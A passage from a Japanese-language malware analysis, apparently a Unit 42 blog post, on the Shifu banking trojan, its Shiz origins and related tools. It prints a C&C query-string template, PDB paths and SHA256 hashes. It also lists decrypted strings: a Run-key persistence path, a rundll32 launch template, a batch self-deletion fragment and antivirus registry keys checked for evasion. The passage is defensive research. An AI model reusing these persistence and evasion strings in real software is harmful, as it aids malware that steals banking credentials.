400;\">\u6700\u65b0\u30d0\u30fc\u30b8\u30e7\u30f3\u5185\u306b\u898b\u3089\u308c\u308b\u201cIntelPowerAgent6\u201d\u3068\u3044\u3046\u6587\u5b57\u5217\u3067\u306f\u306a\u304f\u3001\u4e00\u5ea6\u3082\u4f7f\u308f\u308c\u308b\u3053\u3068\u306e\u306a\u3044\u201cIntelPowerAgent32\u201d\u3068\u3044\u3046\u6587\u5b57\u5217\u304c\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u4e2d\u306b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u30b7\u30b9\u30c6\u30e0\u304c\u65e2\u306b\u611f\u67d3\u3057\u3066\u3044\u308b\u304b\u78ba\u8a8d\u3059\u308b\u305f\u3081\u306b\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u304c\u4f5c\u6210\u3059\u308b\u30a2\u30c8\u30e0\u306b\u52a0\u3048\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u3082\u540d\u524d\u4ed8\u304d\u306e\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u3092\u4f5c\u6210\u3057\u307e\u3059\u304c\u3001\u3053\u306e\u540d\u524d\u306f\u30a2\u30c8\u30e0\u7528\u306e\u540d\u524d\u3092\u751f\u6210\u3059\u308b\u305f\u3081\u306e\u540c\u3058\u624b\u9806\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059(\u4ed8\u9332\u3092\u53c2\u7167\u306e\u3053\u3068)\u3002\u3057\u304b\u3057\u3001\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u306f\u201cDAN6J0-\u201d\u3068\u3044\u3046\u30cf\u30fc\u30c9\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3055\u308c\u305f\u63a5\u982d\u8f9e\u3092\u3001\u30a2\u30c8\u30e0\u6587\u5b57\u5217\u7528\u306b\u3082\u4f7f\u7528\u3055\u308c\u308b\u30d0\u30a4\u30c8 \u30b7\u30fc\u30b1\u30f3\u30b9\u306e\u524d\u306b\u4f7f\u3044\u3001\u6b21\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002\u201c{DAN6J0-ae000000d2000000e100}\u201d<\/p>\n<figure id=\"attachment_23102\" aria-describedby=\"caption-attachment-23102\" style=\"width: 945px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23102 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2.png\" alt=\"\u56f32 Shifu\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u304a\u3088\u3073\u95a2\u9023\u3065\u3051\u3089\u308c\u305fsvchost\u30d7\u30ed\u30bb\u30b9\" width=\"945\" height=\"593\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2.png 945w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2-900x565.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2-300x188.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2-768x482.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2-370x232.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><figcaption id=\"caption-attachment-23102\" class=\"wp-caption-text\">\u56f32 Shifu\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u304a\u3088\u3073\u95a2\u9023\u3065\u3051\u3089\u308c\u305fsvchost\u30d7\u30ed\u30bb\u30b9<\/figcaption><\/figure>\n<h3>Shifu\u3001Shiz\u304a\u3088\u3073\u305d\u306e\u4ed6\u306e\u95a2\u9023\u30c4\u30fc\u30eb<\/h3>\n<p style=\"font-weight: 400;\">Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u7cfb\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u4e3b\u306b\u3001\u4eca\u65e5\u3067\u3082\u3044\u307e\u3060\u306b\u51fa\u56de\u3063\u3066\u3044\u308b\u6700\u53e4\u306e\u30d0\u30f3\u30ad\u30f3\u30b0\u7cfb\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e1\u3064\u3067\u3042\u308bShiz\/iBank\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002Shiz\u306f2006\u5e74\u306b\u521d\u3081\u3066\u767a\u898b\u3055\u308c\u3001\u305d\u306e\u3068\u304d\u4ee5\u6765\u3001\u3044\u304f\u3064\u304b\u306e\u958b\u767a\u30b9\u30c6\u30fc\u30b8\u3092\u7d4c\u3066\u304d\u307e\u3057\u305f\u3002\u305d\u308c\u306f\u3001\u30ed\u30b7\u30a2\u306e\u91d1\u878d\u6a5f\u95a2\u306e\u307f\u3092\u6a19\u7684\u3068\u3057\u305f\u30d0\u30f3\u30ad\u30f3\u30b0\u7cfb\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3068\u3057\u3066\u59cb\u307e\u308a\u307e\u3057\u305f\u3002\u305d\u306e\u5f8c\u3001\u30a4\u30bf\u30ea\u30a2\u306e\u9280\u884c\u3082\u6a19\u7684\u306b\u3055\u308c\u59cb\u3081\u307e\u3057\u305f\u3002\u3053\u308c\u306f\u3001\u3055\u3089\u306a\u308b\u56fd\u969b\u5316\u3092\u8996\u91ce\u306b\u5165\u308c\u305f\u6e96\u5099\u6bb5\u968e\u3067\u3042\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u904e\u53bb5\u5e74\u9593\u3067\u8ffd\u8de1\u3057\u3066\u304d\u305f\u5185\u90e8\u30d0\u30fc\u30b8\u30e7\u30f3\u306f\u3001\u7b2c2\u4e16\u4ee3\u304b\u3089\u7b2c4\u4e16\u4ee3(2011\u5e74)\u304a\u3088\u3073\u7b2c5\u4e16\u4ee3(2013\/2014\u5e74)\u307e\u3067\u306e\u7bc4\u56f2\u306b\u53ca\u3073\u307e\u3059\u3002Shiz\u306e\u7b2c5\u4e16\u4ee3\u304c\u30012014\u5e74\u306b\u5b9f\u4e16\u754c\u3067\u691c\u51fa\u3055\u308c\u305f\u6700\u5f8c\u306e\u4e16\u4ee3(\u6700\u7d42\u5185\u90e8\u30d0\u30fc\u30b8\u30e7\u30f3\u306f5.6.25)\u3067\u3001\u305d\u308c\u306f\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0 \u30b9\u30bf\u30a4\u30eb\u304c\u7b2c4\u4e16\u4ee3\u3068\u306f\u7570\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u304c\u8ca9\u58f2\u307e\u305f\u306f\u5171\u6709\u3055\u308c\u305f\u3053\u3068\u304c\u7279\u5b9a\u3067\u304d\u305f\u305f\u3081\u3001\u5225\u306e\u30d7\u30ed\u30b0\u30e9\u30de\u306b\u3088\u3063\u3066\u958b\u767a\u3055\u308c\u305f\u3088\u3046\u3067\u3059\u3002\u7b2c5\u4e16\u4ee3\u306e\u4e00\u756a\u6700\u521d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306eC&amp;C\u30b5\u30fc\u30d0\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u305f\u30af\u30a8\u30ea\u6587\u5b57\u5217\u304c\u3001\u79c1\u305f\u3061\u306e\u898b\u89e3\u3092\u88cf\u4ed8\u3051\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">botid=%s&amp;ver=5.0.1&amp;up=%u&amp;os=%03u&amp;ltime=%s%d&amp;token=%d&amp;cn=reborn&amp;av=%s<\/p>\n<p style=\"font-weight: 400;\">\u653b\u6483\u6d3b\u52d5\u540d\u306b\u6587\u5b57\u5217\u201creborn\u201d\u304c\u542b\u307e\u308c\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d\u3067\u304d\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">Shifu\u306f\u30012015\u5e74\u4e2d\u76e4\u306b\u3001\u51fa\u56de\u3063\u3066\u3044\u308b\u3053\u3068\u304c\u521d\u3081\u3066\u691c\u51fa\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u306f\u3001\u3055\u3089\u306a\u308b\u56fd\u969b\u5316\u3092\u8996\u91ce\u306b\u5165\u308c\u305f\u3001Shiz\u306e\u7b2c5\u4e16\u4ee3\u306e\u9032\u5316\u578b\u3060\u3068\u78ba\u4fe1\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u79c1\u305f\u3061\u306f\u3001\u904e\u53bb2\u5e74\u9593\u306b\u308f\u305f\u308aShiz\u30d0\u30f3\u30ad\u30f3\u30b0\u7cfb\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u8ffd\u8de1\u3057\u3066\u304d\u305f\u3060\u3051\u3067\u306a\u304f\u3001\u540c\u3058\u4f5c\u6210\u8005\u304b\u3089\u914d\u5e03\u3055\u308c\u305f\u3068\u898b\u3089\u308c\u308b\u3044\u304f\u3064\u304b\u306e\u8ffd\u52a0\u306e\u30de\u30eb\u30a6\u30a7\u30a2 \u30c4\u30fc\u30eb\u3092\u691c\u51fa\u3057\u307e\u3057\u305f\u3002\u53ce\u96c6\u3057\u305f\u30b5\u30f3\u30d7\u30eb\u306f\u3001\u4f5c\u6210\u8005\u304c\u4e00\u9023\u306e\u91d1\u878d\u95a2\u9023\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u5168\u4f53\u3092\u958b\u767a\u3057\u305f\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u4f5c\u6210\u8005\u304c\u30b0\u30eb\u30fc\u30d7\u306e\u4e00\u54e1\u3068\u3057\u3066\u4f5c\u696d\u3057\u3066\u3044\u308b\u306e\u304b\u3001\u307e\u305f\u306f\u30de\u30eb\u30a6\u30a7\u30a2\u305d\u306e\u3082\u306e\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u306e\u304b\u306f\u308f\u304b\u308a\u307e\u305b\u3093\u3002\u3053\u308c\u3089\u306e\u30c4\u30fc\u30eb\u306f\u4e3b\u306b\u3001Shiz\u306e\u7b2c5\u4e16\u4ee3\u306e\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u3053\u308c\u3089\u306e\u30c4\u30fc\u30eb\u306f\u3059\u3079\u3066\u3001\u540c\u3058\u30eb\u30fc\u30c8 \u30d5\u30a9\u30eb\u30c0\u3092\u6301\u3064PDB\u30d1\u30b9\u3092\u542b\u3093\u3067\u3044\u308b\u305f\u3081\u3001\u305d\u308c\u3089\u3092\u4e00\u7dd2\u306b\u3057\u3066\u95a2\u9023\u4ed8\u3051\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">Z:\\coding\\\u2026<\/p>\n<p style=\"font-weight: 400;\">\u3055\u3089\u306b\u3001\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0 \u30b9\u30bf\u30a4\u30eb\u3068\u4f7f\u7528\u3055\u308c\u3066\u3044\u308bAPI\u95a2\u6570\u304c\u975e\u5e38\u306b\u4f3c\u3066\u3044\u308b\u305f\u3081\u3001\u5927\u534a\u306e\u30c4\u30fc\u30eb\u304cShiz\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3001BinDiff\u3067\u30c4\u30fc\u30eb\u9593\u306e\u30b3\u30fc\u30c9\u3092\u6bd4\u8f03\u3059\u308b\u3068\u3001\u304b\u306a\u308a\u985e\u4f3c\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059\u3002\u305d\u306e\u4e0a\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u6a5f\u80fd\u3092\u4f34\u3046\u305d\u308c\u3089\u306e\u30c4\u30fc\u30eb\u306b\u306f\u3001C&amp;C\u30b5\u30fc\u30d0\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u305f\u3081\u306b\u3001Shiz\u3067\u898b\u3089\u308c\u305f\u3082\u306e\u3068\u3088\u304f\u4f3c\u305f\u30af\u30a8\u30ea\u6587\u5b57\u5217\u304c\u7d44\u307f\u8fbc\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u540c\u696d\u8005\u306e<a href=\"https:\/\/www.fireeye.com\/blog\/threat-research\/2015\/10\/shifu-malware-analyzed-behavior-capabilities-and.html\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">FireEye\u304c\u6628\u5e74\u8aac\u660e\u3057\u305f<\/a>\u3068\u304a\u308a\u3001Shifu\u3067\u898b\u3064\u304b\u3063\u305fPDB\u30d1\u30b9\u306f\u4ee5\u4e0b\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">Z:\\coding\\project\\main\\payload\\payload.x86.pdb<\/p>\n<p style=\"font-weight: 400;\">\u79c1\u305f\u3061\u304c\u7279\u5b9a\u3057\u305f\u305d\u306e\u4ed6\u306e\u30c4\u30fc\u30eb\u306b\u306f\u4ee5\u4e0b\u306ePDB\u30d1\u30b9\u304c\u542b\u307e\u308c\u3001\u540c\u3058\u4f5c\u6210\u8005\u304b\u3089\u306e\u3082\u306e\u3068\u601d\u308f\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">Z:\\coding\\cryptor\\Release\\crypted.pdb<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">Z:\\coding\\malware\\tests\\Release\\cryptoshit.pdb<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">Z:\\coding\\malware\\RDP\\output\\Release\\rdp_bot.pdb<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">Z:\\coding\\malware\\ScanBot\\Release\\bot.pdb<\/p>\n<p style=\"font-weight: 400;\">\u5185\u90e8\u7684\u306b\u201ccryptor\u201d\u3068\u540d\u4ed8\u3051\u3089\u308c\u305f\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u306f\u3001BIFIT\u306e\u8ca1\u52d9\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u3092\u653b\u6483\u3059\u308b\u3053\u3068\u3067\u77e5\u3089\u308c\u3066\u3044\u308b\u6700\u521d\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u3001<a href=\"https:\/\/securelist.com\/blog\/virus-watch\/59901\/lock-stock-and-two-smoking-trojans-2\/2\/\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">BifitAgent<\/a>\u306e\u6697\u53f7\u5316\u3055\u308c\u305f\u30b5\u30f3\u30d7\u30eb\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u540c\u3058\u4eba\u7269\u304cBifitAgent\u3092\u958b\u767a\u3057\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u304c\u3001\u305d\u308c\u3092\u793a\u3059\u75d5\u8de1\u306f\u898b\u3064\u304b\u3063\u3066\u3044\u307e\u305b\u3093\u3002\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306b\u3088\u308b\u3068\u3001\u5927\u534a\u306e\u30b5\u30f3\u30d7\u30eb\u306f2013\u5e74\u306e10\u6708\/11\u6708\u306b\u4f5c\u6210\u3055\u308c\u307e\u3057\u305f\u3002<\/p>\n<p style=\"font-weight: 400;\">\u201crdp_bot\u201d\u3068\u3044\u3046\u540d\u524d\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001RDP\u30d7\u30ed\u30c8\u30b3\u30eb\u3092\u4f7f\u7528\u3057\u3066\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u3078\u306e\u30d5\u30eb \u30a2\u30af\u30bb\u30b9\u6a29\u3092\u53d6\u5f97\u3059\u308b\u5c0f\u3055\u306a\u30dc\u30c3\u30c8\u3067\u3059\u3002\u3053\u306e\u8a18\u4e8b\u3067\u8aac\u660e\u3057\u305fShifu\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u540c\u3058\u6539\u5909\u3055\u308c\u305fRC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30c4\u30fc\u30eb\u306f\u3001\u304a\u305d\u3089\u304fShiz\u30d0\u30f3\u30ad\u30f3\u30b0\u7cfb\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3068\u4e00\u7dd2\u306b\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u305d\u308c\u306b\u3088\u3063\u3066\u3001\u653b\u6483\u8005\u306f\u88ab\u5bb3\u8005\u306e\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u304b\u3089\u76f4\u63a5\u3001\u81ea\u8eab\u306e\u4e0d\u6b63\u884c\u70ba\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u308b\u304b\u3089\u3067\u3059\u3002\u305d\u3046\u3059\u308b\u3053\u3068\u3067\u3001IP\u30a2\u30c9\u30ec\u30b9\u3001\u30d6\u30e9\u30a6\u30b6\u306e\u30d5\u30c3\u30c8\u30d7\u30ea\u30f3\u30c8\u3001\u307e\u305f\u306f\u30ad\u30fc\u30dc\u30fc\u30c9 \u30ec\u30a4\u30a2\u30a6\u30c8\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u9280\u884c\u306e\u8a50\u6b3a\u5bfe\u7b56\u30b7\u30b9\u30c6\u30e0\u3092\u6b3a\u304f\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u30c4\u30fc\u30eb\u306f\u3001Alisa Esage\u306b\u3088\u3063\u3066\u5b9f\u65bd\u3055\u308c\u305f<a href=\"https:\/\/de.slideshare.net\/alisaesage\/hacking-microsoft-remote-desktop-services-for-fun-and-profit\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">RDP\u306b\u95a2\u3059\u308b\u8abf\u67fb<\/a>\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002\u30b5\u30f3\u30d7\u30eb\u306e\u65e5\u4ed8\u306f\u30012013\u5e746\u6708\u304b\u308911\u6708\u307e\u3067\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u201ccryptoshit\u201d\u3068\u3044\u3046\u540d\u524d\u306e\u30c4\u30fc\u30eb\u306b\u306f\u3001rdp_bot\u306e\u6697\u53f7\u5316\u3055\u308c\u305f\u30b5\u30f3\u30d7\u30eb\u304c\u542b\u307e\u308c\u3001\u307e\u305f\u3082\u3084\u3001\u3053\u3053\u3067\u8aac\u660e\u3057\u305fShifu\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u540c\u3058\u6539\u5909\u3055\u308c\u305fRC4\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306b\u3088\u308b\u3068\u3001\u30b5\u30f3\u30d7\u30eb\u306e\u65e5\u4ed8\u306f2013\u5e749\u6708\/10\u6708\u304a\u3088\u30732014\u5e741\u6708\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u5185\u90e8\u540d\u304c\u201cScanBot\u201d\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u30aa\u30da\u30ec\u30fc\u30bf\u304b\u3089\u306e\u30b3\u30de\u30f3\u30c9\u3092\u4ecb\u3057\u3066\u88ab\u5bb3\u8005\u306e\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u5185\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30b9\u30ad\u30e3\u30f3\u3059\u308b\u305f\u3081\u306bSuper Light Regular Expression\u30e9\u30a4\u30d6\u30e9\u30ea(SRLE)\u3092\u4f7f\u7528\u3059\u308b\u5c0f\u3055\u306a\u30d0\u30c3\u30af\u30c9\u30a2\u3067\u3059\u3002\u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306b\u3088\u308b\u3068\u3001\u30b5\u30f3\u30d7\u30eb\u306e\u65e5\u4ed8\u306f2013\u5e746\u6708\u3067\u3059\u3002<\/p>\n<h3>Shifu\u5bfe\u7b56\u306e\u4fdd\u8b77<\/h3>\n<p style=\"font-weight: 400;\">Palo Alto Networks\u306e\u304a\u5ba2\u69d8\u306f\u3001\u6b21\u306e\u65b9\u6cd5\u3067Shifu\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">Wildfire\u304cShifu\u30d5\u30a1\u30a4\u30eb\u3092\u60aa\u610f\u306e\u3042\u308b\u3082\u306e\u3068\u3057\u3066\u5206\u985e\u3057\u3001\u7f72\u540d\u306f\u8105\u5a01\u9632\u5fa1\u306b\u8aad\u307f\u8fbc\u307e\u308c\u307e\u3059\u3002<\/li>\n<li style=\"font-weight: 400;\">AutoFocus\u306e\u304a\u5ba2\u69d8\u306f\u3001<a href=\"https:\/\/autofocus.paloaltonetworks.com\/\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">Shifu<\/a>\u30bf\u30b0\u3092\u4f7f\u7528\u3057\u3066\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u8ffd\u8de1\u3067\u304d\u307e\u3059\u3002<\/li>\n<li style=\"font-weight: 400;\">Shifu\u306b\u3088\u3063\u3066\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30b3\u30de\u30f3\u30c9 \u30a2\u30f3\u30c9 \u30b3\u30f3\u30c8\u30ed\u30fc\u30eb \u30c9\u30e1\u30a4\u30f3\u306f\u3001\u8105\u5a01\u9632\u5fa1\u3092\u901a\u3058\u3066\u30d6\u30ed\u30c3\u30af\u3055\u308c\u307e\u3059\u3002<\/li>\n<\/ul>\n<h3>\u8aac\u660e\u3057\u305f\u30b5\u30f3\u30d7\u30eb\u306eSHA256\u30cf\u30c3\u30b7\u30e5<\/h3>\n<h4>\u521d\u671f\u306e\u96e3\u8aad\u5316\u3055\u308c\u305f\u30ed\u30fc\u30c0\u30fc<\/h4>\n<p style=\"font-weight: 400; padding-left: 40px;\">d3f9c4037f8b4d24f2baff1e0940d2bf238032f9343d06478b5034d0981b2cd9<br \/>\n368b23e6d9ec7843e537e9d6547777088cf36581076599d04846287a9162652b<br \/>\ne7e154c65417f5594a8b4602db601ac39156b5758889f708dac7258e415d4a18<br \/>\nf63ec1e5752eb8b9a07104f42392eebf143617708bfdd0fe31cbf00ef12383f9<\/p>\n<h4>\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc<\/h4>\n<p style=\"font-weight: 400; padding-left: 40px;\">003965bd25acb7e8c6e16de4f387ff9518db7bcca845502d23b6505d8d3cec01<br \/>\n1188c5c9f04658bef20162f3001d9b89f69c93bf5343a1f849974daf6284a650<\/p>\n<h4>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc<\/h4>\n<p style=\"font-weight: 400; padding-left: 40px;\">e7c1523d93154462ed9e15e84d3af01abe827aa6dd0082bc90fc8b58989e9a9a<\/p>\n<h4>CVE-2016-0167\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8(x86)<\/h4>\n<p style=\"padding-left: 40px;\">5124f4fec24acb2c83f26d1e70d7c525daac6c9fb6e2262ed1c1c52c88636bad<\/p>\n<h4>CVE-2016-0167\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8(x64)<\/h4>\n<p style=\"font-weight: 400; padding-left: 40px;\">f3c2d4090f6f563928e9a9ec86bf0f1c6ee49cdc110b7368db8905781a9a966e<\/p>\n<h4>\u30e1\u30a4\u30f3\u306e\u30da\u30a4\u30ed\u30fc\u30c9<\/h4>\n<p style=\"font-weight: 400; padding-left: 40px;\">e9bd4375f9b0b95f385191895edf81c8eadfb3964204bbbe48f7700fc746e4dc<br \/>\n5ca2a9de65c998b0d0a0a01b4aa103a9410d76ab86c75d7b968984be53e279b6<\/p>\n<h3>\u4ed8\u9332 - \u6280\u8853\u8a73\u7d30<\/h3>\n<h4>\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306e\u5206\u6790<\/h4>\n<p style=\"font-weight: 400;\">\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc(x86 DLL)\u304c\u542b\u307e\u308c\u3066\u304a\u308a\u3001\u3053\u308c\u306f\u305d\u306e\u5f8c\u3001CVE-2016-0167\u306e2\u3064\u306e\u57cb\u3081\u8fbc\u307f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8(x86\/64 DLL)\u306b\u306a\u308a\u307e\u3059\u3002\u307e\u305f\u3001\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f\u3001\u305d\u306e.tls\u30bb\u30af\u30b7\u30e7\u30f3\u306b\u3001\u6697\u53f7\u5316\u3055\u308c\u3001aPLib\u3067\u5727\u7e2e\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9 \u30e2\u30b8\u30e5\u30fc\u30eb(x86 DLL)\u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u5fa9\u53f7\u5316\u3059\u308b\u306b\u306f\u3001.rsrc\u30bb\u30af\u30b7\u30e7\u30f3\u306b\u4fdd\u5b58\u3055\u308c\u3066\u3044\u308bsalt\u5024\u3068\u6539\u5909\u3055\u308c\u305f\u30d0\u30fc\u30b8\u30e7\u30f3\u306eRC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306e.data\u30bb\u30af\u30b7\u30e7\u30f3\u306b\u3042\u308b\u6709\u610f\u7fa9\u306a\u6587\u5b57\u5217\u306f\u3001\u93750x8D\u3067XOR\u3055\u308c\u3001\u5373\u5ea7\u306b\u5fa9\u53f7\u5316\u3055\u308c\u307e\u3059\u3002\u5fa9\u53f7\u5316\u3055\u308c\u305f\u6587\u5b57\u5217:<\/p>\n<pre class=\"lang:default decode:true\">AddMandatoryAce\r\nADVAPI\r\nAdvapi32.dlladvapi32.dllws2_32.dll\r\nWPUCloseEvent\r\nWPUCloseSocketHandleWPUCreateEvent\r\nWPUCreateSocketHandle\r\nWPUFDIsSet\r\nWPUGetProviderPath\r\nWPUModifyIFSHandle\r\nWPUPostMessage\r\nWPUQueryBlockingCallbackWPUQuerySocketHandleContext\r\nWPUQueueApc\r\nWPUResetEvent\r\nWPUSetEvent\r\nWPUOpenCurrentThreadWPUCloseThread\r\nWSPStartup\r\n &gt; %1\\r\\ndel %0\r\nsoftware\\\\microsoft\\\\windows\\\\currentversion\\\\run\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/echo \r\nrundll32.exe shell32.dll, ShellExec_RunDLL %s\r\nMicrosoft\\\\Microsoft AntimalwareSoftware\\\\Coranti\r\nSoftware\\\\risingSoftware\\\\TrendMicroSoftware\\\\Symantec\r\nSoftware\\\\ComodoGroup\r\nSoftware\\\\Network Associates\\\\TVD\r\nSoftware\\\\Data Fellows\\\\F-SecureSoftware\\\\Eset\\\\Nod\r\nSoftware\\\\Softed\\\\ViGUARD\r\nSoftware\\\\Zone Labs\\\\ZoneAlarm\r\nSoftware\\\\Avg\r\nSoftware\\\\VBA32\r\nSoftware\\\\Doctor WebSoftware\\\\G DataSoftware\\\\Avira\r\nSoftware\\\\AVAST Software\\\\Avast\r\nSoftware\\\\KasperskyLab\\\\protected\r\nSoftware\\\\Bitdefender\r\nSoftware\\\\Panda SoftwareSoftware\\\\Sophos.bat\\\\\\\\.\\\\%C:\r\n|$$$}rstuvwxyz{$$$$$$$&gt;?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\\\\]^_`abcdefghijklmnopq\r\nconhost\r\nCreateProcessInternalW\r\nConvertStringSecurityDescriptorToSecurityDescriptorWContent-Type: multipart\/form-data; boundary=---------------------------%s\\r\\n\r\nContent-Type: 